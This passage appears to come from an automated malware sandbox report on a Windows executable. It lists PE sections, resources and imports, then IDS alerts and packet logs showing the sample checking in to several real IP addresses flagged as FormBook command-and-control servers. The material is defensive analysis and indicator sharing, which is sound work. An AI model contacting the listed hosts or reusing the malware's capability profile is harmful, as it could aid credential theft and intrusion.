                                                                                       IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                                                       IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                                                       IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xb2730 | 0x40 | .rdata
                                                                                       IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                                                       IMAGE_DIRECTORY_ENTRY_IAT | 0x8d000 | 0x860 | .rdata
                                                                                       IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                                                       IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                                                       IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                                                       Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                                                       .text | 0x1000 | 0x8b54f | 0x8b600 | f437a6545e938612764dbb0a314376fc | False | 0.5699499019058296 | data | 6.680413749210956 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                       .rdata | 0x8d000 | 0x2cc42 | 0x2ce00 | 827ffd24759e8e420890ecf164be989e | False | 0.330464397632312 | data | 5.770192333189168 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                       .data | 0xba000 | 0x9d54 | 0x6200 | e0a519f8e3a35fae0d9c2cfd5a4bacfc | False | 0.16402264030612246 | data | 2.002691099965349 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                       .rsrc | 0xc4000 | 0x55ddc | 0x55e00 | 6c078aef17878ee1f04d594f4d5a0801 | False | 0.9262076965065502 | data | 7.891175276345883 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                       .reloc | 0x11a000 | 0xa474 | 0xa600 | 0bc98f8631ef0bde830a7f83bb06ff08 | False | 0.5017884036144579 | data | 5.245426654116355 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                       Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                                                       RT_ICON | 0xc44a0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
                                                                                       RT_ICON | 0xc45c8 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
                                                                                       RT_ICON | 0xc48b0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
                                                                                       RT_ICON | 0xc49d8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
                                                                                       RT_ICON | 0xc5880 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
                                                                                       RT_ICON | 0xc6128 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
                                                                                       RT_ICON | 0xc6690 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
                                                                                       RT_ICON | 0xc8c38 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
                                                                                       RT_ICON | 0xc9ce0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
                                                                                       RT_STRING | 0xca148 | 0x594 | data | English | Great Britain | 0.3333333333333333
                                                                                       RT_STRING | 0xca6dc | 0x68a | data | English | Great Britain | 0.2747909199522103
                                                                                       RT_STRING | 0xcad68 | 0x490 | data | English | Great Britain | 0.3715753424657534
                                                                                       RT_STRING | 0xcb1f8 | 0x5fc | data | English | Great Britain | 0.3087467362924282
                                                                                       RT_STRING | 0xcb7f4 | 0x65c | data | English | Great Britain | 0.34336609336609336
                                                                                       RT_STRING | 0xcbe50 | 0x466 | data | English | Great Britain | 0.3605683836589698
                                                                                       RT_STRING | 0xcc2b8 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
                                                                                       RT_RCDATA | 0xcc410 | 0x4d4b2 | data | | | 1.0003348136730323
                                                                                       RT_GROUP_ICON | 0x1198c4 | 0x76 | data | English | Great Britain | 0.6610169491525424
                                                                                       RT_GROUP_ICON | 0x11993c | 0x14 | data | English | Great Britain | 1.15
                                                                                       RT_VERSION | 0x119950 | 0xdc | data | English | Great Britain | 0.6181818181818182
                                                                                       RT_MANIFEST | 0x119a2c | 0x3b0 | ASCII text, with CRLF line terminators | English | Great Britain | 0.5116525423728814
DLL | Import
WSOCK32.dll | __WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
VERSION.dll | GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll | InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll | UnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll | IsThemeActive
KERNEL32.dll | HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
USER32.dll | SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
GDI32.dll | SetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll | GetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
SHELL32.dll | DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll | RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit
Language of compilation system | Country where language is spoken | Map
English | Great Britain | (map image not reproduced)
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-13T09:26:31.986660+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 20.109.210.53 | 443 | 192.168.2.4 | 49730 | TCP
2024-11-13T09:26:44.569269+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49736 | 38.88.82.56 | 80 | TCP
2024-11-13T09:26:51.947915+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 52.149.20.212 | 443 | 192.168.2.4 | 58815 | TCP
2024-11-13T09:26:53.351914+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 52.149.20.212 | 443 | 192.168.2.4 | 58816 | TCP
2024-11-13T09:27:00.343483+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 58817 | 3.33.130.190 | 80 | TCP
2024-11-13T09:27:03.753028+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 58818 | 3.33.130.190 | 80 | TCP
2024-11-13T09:27:05.405537+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 58819 | 3.33.130.190 | 80 | TCP
2024-11-13T09:27:07.951083+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 58820 | 3.33.130.190 | 80 | TCP
2024-11-13T09:27:14.244016+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 58822 | 194.58.112.174 | 80 | TCP
2024-11-13T09:27:16.921423+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 58838 | 194.58.112.174 | 80 | TCP
2024-11-13T09:27:19.306881+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 58854 | 194.58.112.174 | 80 | TCP
2024-11-13T09:27:21.875358+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 58870 | 194.58.112.174 | 80 | TCP
2024-11-13T09:27:27.678498+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 58902 | 3.33.130.190 | 80 | TCP
2024-11-13T09:27:30.221107+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 58917 | 3.33.130.190 | 80 | TCP
2024-11-13T09:27:32.803146+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 58932 | 3.33.130.190 | 80 | TCP
2024-11-13T09:27:35.341841+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 58948 | 3.33.130.190 | 80 | TCP
2024-11-13T09:27:42.064513+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 58983 | 104.21.14.183 | 80 | TCP
2024-11-13T09:27:44.597204+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 58999 | 104.21.14.183 | 80 | TCP
2024-11-13T09:27:47.160557+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 59009 | 104.21.14.183 | 80 | TCP
2024-11-13T09:27:50.170836+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 59023 | 104.21.14.183 | 80 | TCP
2024-11-13T09:27:56.034508+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 59058 | 67.223.117.142 | 80 | TCP
2024-11-13T09:27:58.597030+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 59069 | 67.223.117.142 | 80 | TCP
2024-11-13T09:28:01.387326+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 59085 | 67.223.117.142 | 80 | TCP
2024-11-13T09:28:03.667072+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 59101 | 67.223.117.142 | 80 | TCP
2024-11-13T09:28:09.323526+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 59102 | 3.33.130.190 | 80 | TCP
2024-11-13T09:28:11.872164+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 59103 | 3.33.130.190 | 80 | TCP
2024-11-13T09:28:15.300346+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 59104 | 3.33.130.190 | 80 | TCP
2024-11-13T09:28:17.827029+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 59105 | 3.33.130.190 | 80 | TCP
2024-11-13T09:28:24.003472+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 59106 | 113.20.119.31 | 80 | TCP
2024-11-13T09:28:26.550389+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 59107 | 113.20.119.31 | 80 | TCP
2024-11-13T09:28:29.144201+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 59108 | 113.20.119.31 | 80 | TCP
2024-11-13T09:28:31.644067+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 59109 | 113.20.119.31 | 80 | TCP
2024-11-13T09:28:38.300689+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 59110 | 47.129.103.185 | 80 | TCP
2024-11-13T09:28:40.832105+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 59111 | 47.129.103.185 | 80 | TCP
2024-11-13T09:28:43.409754+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 59112 | 47.129.103.185 | 80 | TCP
2024-11-13T09:28:45.910009+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 59113 | 47.129.103.185 | 80 | TCP
2024-11-13T09:28:51.797362+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 59114 | 38.47.237.27 | 80 | TCP
2024-11-13T09:28:54.330228+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 59115 | 38.47.237.27 | 80 | TCP
2024-11-13T09:28:56.906066+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 59116 | 38.47.237.27 | 80 | TCP
2024-11-13T09:28:59.452166+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 59117 | 38.47.237.27 | 80 | TCP
2024-11-13T09:29:06.175663+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 59118 | 206.119.81.36 | 80 | TCP
2024-11-13T09:29:08.769360+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 59119 | 206.119.81.36 | 80 | TCP
2024-11-13T09:29:11.316348+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 59120 | 206.119.81.36 | 80 | TCP
2024-11-13T09:29:13.863112+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 59121 | 206.119.81.36 | 80 | TCP
2024-11-13T09:29:19.904719+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 59122 | 172.217.16.211 | 80 | TCP
                                                                                      Nov 13, 2024 09:27:19.306839943 CET8058854194.58.112.174192.168.2.4
                                                                                      Nov 13, 2024 09:27:19.306874990 CET8058854194.58.112.174192.168.2.4
                                                                                      Nov 13, 2024 09:27:19.306880951 CET5885480192.168.2.4194.58.112.174
                                                                                      Nov 13, 2024 09:27:19.306916952 CET5885480192.168.2.4194.58.112.174
                                                                                      Nov 13, 2024 09:27:19.623397112 CET8058854194.58.112.174192.168.2.4
                                                                                      Nov 13, 2024 09:27:19.623564959 CET5885480192.168.2.4194.58.112.174
                                                                                      Nov 13, 2024 09:27:19.957416058 CET5885480192.168.2.4194.58.112.174
                                                                                      Nov 13, 2024 09:27:20.986943960 CET5887080192.168.2.4194.58.112.174
                                                                                      Nov 13, 2024 09:27:20.992106915 CET8058870194.58.112.174192.168.2.4
                                                                                      Nov 13, 2024 09:27:20.992373943 CET5887080192.168.2.4194.58.112.174
                                                                                      Nov 13, 2024 09:27:21.047791004 CET5887080192.168.2.4194.58.112.174
                                                                                      Nov 13, 2024 09:27:21.053303003 CET8058870194.58.112.174192.168.2.4
                                                                                      Nov 13, 2024 09:27:21.875041962 CET8058870194.58.112.174192.168.2.4
                                                                                      Nov 13, 2024 09:27:21.875113964 CET8058870194.58.112.174192.168.2.4
                                                                                      Nov 13, 2024 09:27:21.875152111 CET8058870194.58.112.174192.168.2.4
                                                                                      Nov 13, 2024 09:27:21.875186920 CET8058870194.58.112.174192.168.2.4
                                                                                      Nov 13, 2024 09:27:21.875224113 CET8058870194.58.112.174192.168.2.4
                                                                                      Nov 13, 2024 09:27:21.875258923 CET8058870194.58.112.174192.168.2.4
                                                                                      Nov 13, 2024 09:27:21.875294924 CET8058870194.58.112.174192.168.2.4
                                                                                      Nov 13, 2024 09:27:21.875358105 CET5887080192.168.2.4194.58.112.174
                                                                                      Nov 13, 2024 09:27:21.875359058 CET5887080192.168.2.4194.58.112.174
                                                                                      Nov 13, 2024 09:27:21.875359058 CET5887080192.168.2.4194.58.112.174
                                                                                      Nov 13, 2024 09:27:21.875435114 CET8058870194.58.112.174192.168.2.4
                                                                                      Nov 13, 2024 09:27:21.875507116 CET5887080192.168.2.4194.58.112.174
                                                                                      Nov 13, 2024 09:27:22.024329901 CET8058870194.58.112.174192.168.2.4
                                                                                      Nov 13, 2024 09:27:22.024697065 CET5887080192.168.2.4194.58.112.174
                                                                                      Nov 13, 2024 09:27:22.025183916 CET5887080192.168.2.4194.58.112.174
                                                                                      Nov 13, 2024 09:27:22.030061007 CET8058870194.58.112.174192.168.2.4
                                                                                      Nov 13, 2024 09:27:27.051245928 CET5890280192.168.2.43.33.130.190
                                                                                      Nov 13, 2024 09:27:27.056226015 CET80589023.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:27:27.056289911 CET5890280192.168.2.43.33.130.190
                                                                                      Nov 13, 2024 09:27:27.064198017 CET5890280192.168.2.43.33.130.190
                                                                                      Nov 13, 2024 09:27:27.069055080 CET80589023.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:27:27.678447962 CET80589023.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:27:27.678498030 CET5890280192.168.2.43.33.130.190
                                                                                      Nov 13, 2024 09:27:28.565639973 CET5890280192.168.2.43.33.130.190
                                                                                      Nov 13, 2024 09:27:28.570643902 CET80589023.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:27:29.588078976 CET5891780192.168.2.43.33.130.190
                                                                                      Nov 13, 2024 09:27:29.594635010 CET80589173.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:27:29.594748974 CET5891780192.168.2.43.33.130.190
                                                                                      Nov 13, 2024 09:27:29.627119064 CET5891780192.168.2.43.33.130.190
                                                                                      Nov 13, 2024 09:27:29.632169008 CET80589173.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:27:30.221040964 CET80589173.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:27:30.221107006 CET5891780192.168.2.43.33.130.190
                                                                                      Nov 13, 2024 09:27:31.143930912 CET5891780192.168.2.43.33.130.190
                                                                                      Nov 13, 2024 09:27:31.149091959 CET80589173.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:27:32.161731958 CET5893280192.168.2.43.33.130.190
                                                                                      Nov 13, 2024 09:27:32.167409897 CET80589323.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:27:32.167696953 CET5893280192.168.2.43.33.130.190
                                                                                      Nov 13, 2024 09:27:32.175096989 CET5893280192.168.2.43.33.130.190
                                                                                      Nov 13, 2024 09:27:32.180162907 CET80589323.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:27:32.180272102 CET80589323.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:27:32.180299997 CET80589323.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:27:32.180326939 CET80589323.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:27:32.180352926 CET80589323.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:27:32.180448055 CET80589323.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:27:32.180474997 CET80589323.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:27:32.180502892 CET80589323.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:27:32.180531025 CET80589323.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:27:32.802982092 CET80589323.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:27:32.803145885 CET5893280192.168.2.43.33.130.190
                                                                                      Nov 13, 2024 09:27:33.690890074 CET5893280192.168.2.43.33.130.190
                                                                                      Nov 13, 2024 09:27:33.696094990 CET80589323.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:27:34.708765030 CET5894880192.168.2.43.33.130.190
                                                                                      Nov 13, 2024 09:27:34.715574980 CET80589483.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:27:34.715662003 CET5894880192.168.2.43.33.130.190
                                                                                      Nov 13, 2024 09:27:34.721456051 CET5894880192.168.2.43.33.130.190
                                                                                      Nov 13, 2024 09:27:34.726347923 CET80589483.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:27:35.341252089 CET80589483.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:27:35.341774940 CET80589483.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:27:35.341840982 CET5894880192.168.2.43.33.130.190
                                                                                      Nov 13, 2024 09:27:35.345294952 CET5894880192.168.2.43.33.130.190
                                                                                      Nov 13, 2024 09:27:35.350215912 CET80589483.33.130.190192.168.2.4
